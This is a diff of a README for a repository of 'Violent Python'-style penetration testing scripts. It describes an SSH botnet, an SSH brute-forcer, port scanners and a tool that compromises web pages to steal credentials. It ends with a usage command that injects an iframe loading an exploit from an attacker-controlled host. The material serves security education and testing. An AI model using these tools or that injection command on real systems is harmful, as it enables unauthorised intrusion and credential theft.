taymourniazi/Digital-Forensic-Analytics/README.md

 Forensic Investigation, Network Traffic Analysis, Penetration Testing, Antivirus Evasion, Web recon

+These codes are almost similar to book: "Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers" book by TJ.
+O’Connor.

+I Use virtualbox to setup a Ubuntu 18.04 LTS linux box to run these on The actual i have is Kali Linux 64 Bit 2018.2

 # Penetration Testing
 ## PortScan.py

 In the command Line pass the port argument as a string i.e in " " for multiple port like follow;
 taymour:∼# python portScan.py -H 10.50.60.125 -p "21, 1720"

+## Nmap_Port_Scanner.py
+Scan the ports on the provided hosts.

+## D) SSH_Botnet.py
+Issue commands on ssh hosts at once provided you have the user names and passwords.

+## E) sshBrute.py
+Brute forces a host's ssh server with a provided worldlist

 ## H) botNet.py

-Change IP, Root, Password to issue SSH commands on compromised machines
+Change IP, Root, Password to issue SSH commands on compromised machines.

 ## I) anonLogin.py
 First you have to allow /etc/vsftpd.conf file to enable anon_login to yes or uncomment it

 ## L) massCompromise.py
-In command line following options are required to attack wb pages and inject your own html file to steal compromised user credentials in default location
+In command line following options are required to attack web pages and inject your own html file to steal compromised user credentials in default location

 attacker# python massCompromise.py -H 192.168.95.179 -r '<iframe src=" http://10.10.10.112:8080/exploit"></iframe>' -f userpass.txt